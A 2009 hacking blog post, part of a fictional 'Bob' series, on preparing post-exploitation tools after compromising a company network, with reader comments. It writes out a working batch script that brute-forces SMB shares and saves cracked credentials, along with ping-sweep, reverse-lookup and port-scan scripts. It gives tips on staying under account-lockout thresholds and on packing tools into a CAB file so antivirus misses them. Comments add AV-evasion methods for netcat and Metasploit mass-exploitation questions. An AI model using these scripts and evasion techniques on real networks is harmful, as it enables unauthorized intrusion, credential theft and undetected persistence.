Tuesday, November 3, 2009

Bob Prepares For Action

Previously in Bob land.......



Bobs back and he's been thinking about his new playground. He's realised that if he's not careful he'll attract attention and get into trouble, so he needs to lay down some ground-rules and define some goals before he goes back on the Wallifords network. If he's going to get the maximum benefit from Wallifords as a training ground rather than a playground he needs to get serious and stop recklessly throwing exploits at any old box.

Goal 1
To extract as much information about the Walliford Network as possible.

Goal 2
To identify high value targets and gain access to those systems.

Goal 3
To remain undetected.

Goal 4
To generally have fun, learn his tools and practice his techniques.


Pretty simple goals eh. Bob knows that to remain undetected he's going to have to use as many tools that are already on the compromised host as he can. He knows that he needs to use as many legitimate tools as possible and only upload those that won't be detected by AV.

Getting his tools onto the compromised hosts is important, but uploading them one by one is a pain in the arse. Then Bob remembers something he heard in a great presentation on post exploitation from Dean Der Beer, a reference to a tool called Metacab. He takes a look at Metacab but decides against using it. Bob really likes the idea of Metacab but he wants a different set of tools so he goes about making his own version. Using the Makecab tool already in XP he creates a cab file containing the few additional tools he needs, knowing he can upload and extract the files from the cab with native windows tools from straight from the command-line.

The one tool he cannot do without is netcat but AV picks it up quite easily. Then Bob remembers that his Nmap directory has ncat, a new version of netcat with loads of additional features. Bob runs it through virustotal to see what gives.



Perfect, only detected by one AV product out of 41. Now Bob knows that he can use this tool for file transfer, creating proxies and even backdoors. Many of the other tools he decides to include in the cab file come from the Windows Resource Kit. This means that there is very little chance of them being detected by AV or looking like Potentially Unwanted Applications (PUA) on the host.


Tools List

cmd.exe
dsadd.exe
dsget.exe
dsquery.exe
edit.com
ncat.exe
net.exe
ngrep.exe
pmon.exe
PortQry.exe
reg.exe
srvinfo.exe
WinDump.exe

As expected VirusTotal finds nothing wrong with his other tools, but then again why would it.

So looking at his tools Bob has his ncat for backdoors and file transfer, he has a port scanner, pmon for keeping an eye on his hosts CPU and memory, tools for extracting anything out of Active Directory, packet sniffers, SrvInfo which is great for looking at details of servers. He also includes a couple of standard tools such as Net.exe and Cmd.exe which are there just encase they had been removed by the Sys Admin. Hopefully he's got everything he needs for a successful expedition into the Walliford Fries network. If not, he'll go back to the drawingboard and create a new cab file.

Bob also creates a few bat files that he can use for scanning and password checks. It's easier to create these now and include them in the cab than it is to write them on the fly.

His first bat file is a simple bruteforce script that will use in-built windows functions to bruteforce shares. He'll supply a userlist (names.txt) and a common password list (words.txt) to the bat file. The password list will be common passwords and can be tweaked using the inbuilt DOS Edit tool when he's on the target, and the userlists will be generated from his enumeration tool dsquery . After running the bruteforce script any succesfull logins will be saved to a text file (creds.txt). Bob knows from performing password audits in his other life that even when complex passwords are enforced users will still pick dumb complex passwords, such as Password01. And when it comes to change it......well of course were looking at Password02!

Before any bruteforcing is done Bob will be checking the password policies so he doesn't trip any account lockout thresholds. So if the account lockout policy triggers after 3 incorrect attempts in half an hour he'll just try 2 common passwords on all accounts. As they say, slow and steady wins the race.

Set /P target="Enter Target To Perform BF on:"
For /F %%i in (names.txt) do @(for /f %%j in (words.txt) do @echo %%i:%%j & @net use \\%target% %%j /u:%%i 2>nul && echo %%i:%%j >> ./creds.txt && net use \\%target% /del)


Bob will use the either net.exe or dsquery.exe to populate his names.txt file. Dsquery is fantastic for ripping through Active Directory and if you know what your doing you can use them to pretty much find out anything about users and computers. The beauty is, these tools can be run from any user account, so you don't need to pop an admins box to get some juicy info.

The next bat file that bob will include is to check for hosts that respond to a ping and output the results to a file.

set /P subnet="Enter subnet:"
for /L %%i in (1,1,255) do @ping -n 1 -w 1 %subnet%.%%i | find "Reply"



Another bat file is created to perform reverse lookups using a nslookup FOR loop.

set /P subnet="Enter subnet:"
For /L %%i in (1,1,255) do @nslookup %subnet%.%%i 2>nul | find "Name" && echo %subnet%.%%i



And finally a bat file to use the Portqry tool for port scans against hosts in a host file (hosts.txt). Again he can use dsquery or net.exe to populate the hosts file.

For /F %%i in (hosts.txt) do @PortQry.exe -n %%i -o 21,22,23,25,80,139,445,3389,1433 -p tcp

Ok, that'll do for now. Bob builds his ddf file for his cab file and creates the cab.

;*** MakeCAB Directive File for bin
;
.OPTION EXPLICIT ;*** Generate errors

.Set MaxCabinetSize=0
.Set MaxDiskSize=0

.Set CabinetNameTemplate=bin.cab

.set DiskDirectoryTemplate=CDROM ;

.Set CompressionType=MSZIP ;

.Set UniqueFiles="OFF"

.Set Cabinet=on
.Set DiskDirectory1=bin
bf.bat
cmd.exe
dsadd.exe

dsget.exe

dsquery.exe

edit.com

hosts.txt
names.txt

ncat.exe
net.exe

ngrep.exe

pingsweep.bat

pmon.exe

port-scan.bat

PortQry.exe

reg.exe

rev-lookup.bat

srvinfo.exe

WinDump.exe

words.txt

;*** EOF




And to build his super duper cab, he makes sure all the tools, bat files and the bin.ddf file is in the same directory and.....

makecab /F bin.ddf



Perfect, after building his cab file it comes in at less than 1MB, Bob honestly couldn't be happier. He'll have to use the windows built-in tool called Expand.exe to get his files out of the cab.

expand /F:* bin.cab .




Right with that done Bob is almost ready to hop onto his target and put his tools to good use and start his network exploration.



Bob Builds His Custom Payloads - Part 4 .......coming next

12 comments:

Dave said...

I guess it's only a matter of time before the AVs pick up ncat. I saw a video of a live demo by muts in which he used Olly and LordPE to modify netcat.exe. The procedure involved adding a routine at the end to XOR the code. The executable was allowed to step through the routine to encode it then it was saved as netcatmod.exe.

It seemed a bit fiddly initially but, having watched it a few times, the process made sense.

Keep up the Bob stories - they're fascinating and educational!

SynJunkie said...

I'll have to hunt that video down. I had heard in the post exploitation presentation that it was pretty easy but I wanted to get to grips with ncat. I only wish it had the -z option though.

Cheers for the feedback

Syn

Anonymous said...

Very good posts indeed. Could you please give us something about metasploit automation and mass exploiting (e.g. using db_autopwn + AutoRunScript + multiscript.rb).

Also could you please explain how to exploit the target (e.g. using psexec msf module + meterpreter), then automatically run some script (i.e. using AutoRunScript), and then *immediately* close that session ? I did not suceeded in closing these sessions but manually using "sessions -k". Is there a way to close the session upon AutoRunScript execution end ?

Please explain.

Cheers,
j

Dave said...

Try here:

hxxp://www.offensive-security.com/videos/shmoocon-presentation-2008-video/piss-on-your-av.html

Dave

hex29a said...

Another episode in the Bob story, me likey a lot :D


A note, the stock ncat.exe seems to need winpcap and visual c++ runtime installed to run..

SynJunkie said...

hex29a - Bugger! I'll have to test it tommorrow.

Looks like Bobs gonna have to use Dave's suggestion.

Thanks

SynJunkie said...

J - Thats not a feature I have used before but I'll take a look and figure it out. I'm sure it can be squeezed into a Bob story at some stage ;-)

STRSHR said...

Generally, it's not that good idea to scan things that you need on Virustotal, because even if something isn't detected at the moment that increases the chances that it would be detected very soon, sometimes in a matter of hours, that's because Virustotal forwards all the stuff to antivirus vendors.

SynJunkie said...

STRSHR - Thats a very good point and something i'm aware of, but in most cases the obfuscation/encoding techniques can be validated using such a service.

Good point though and something which Bob might have made clear in the post ;-)

STRSHR said...

A good alternative is http://scanner.novirusthanks.org/ , they still have a "Do not distribute the sample" option which is generally trusted to be real, the disadvantage of that site is that their definitions aren't always so bleeding edge as those on Virustotal. It's a matter of personal choice.

g3k said...

Syn,

I've been enjoying your Bob Adventures.

Got a quick question about your lab setup. What do you have running and how did you set it up?

Also a word on Metasploit. Documentation seems to be weird on how to use it... I've tried going through the Unleashed course OffSec put out, but it seems confusing, I get the basics on how to get around the program, but I'm having trouble I guess successfully attacking a target. I guess this is more of a vulnerability scanner question.

Thanks for the awesome posts, keep them up!

-g3k

SynJunkie said...

g3k - My labs pretty complicated. It's a mixture of Parallels and the Xen infrastructure (the free version that supports 5 servers). Basically the Xen server is an old laptop that has mostly server VM's on and the the clients are usually Parallels VM's. I also use a netbook as my main attacking platform which is a dualboot XP and BackTrack 4. It works pretty well as I only spin stuff up as i need it.

Regarding your MSF trouble, if I can help I will. Are you attacking physical to virtual or virtual to virtual? I found I always get better results using my netbook as the attacking box. Whenever I attacked virtual host from virtual host I always get unpredictable results.

I'm working on the next few Bob posts, I'm just trying to come up with something interesting and worthwhile that might be useful to someone other than myself.

Any questions about MSF, you can hit me up with an email.

Cheers

Syn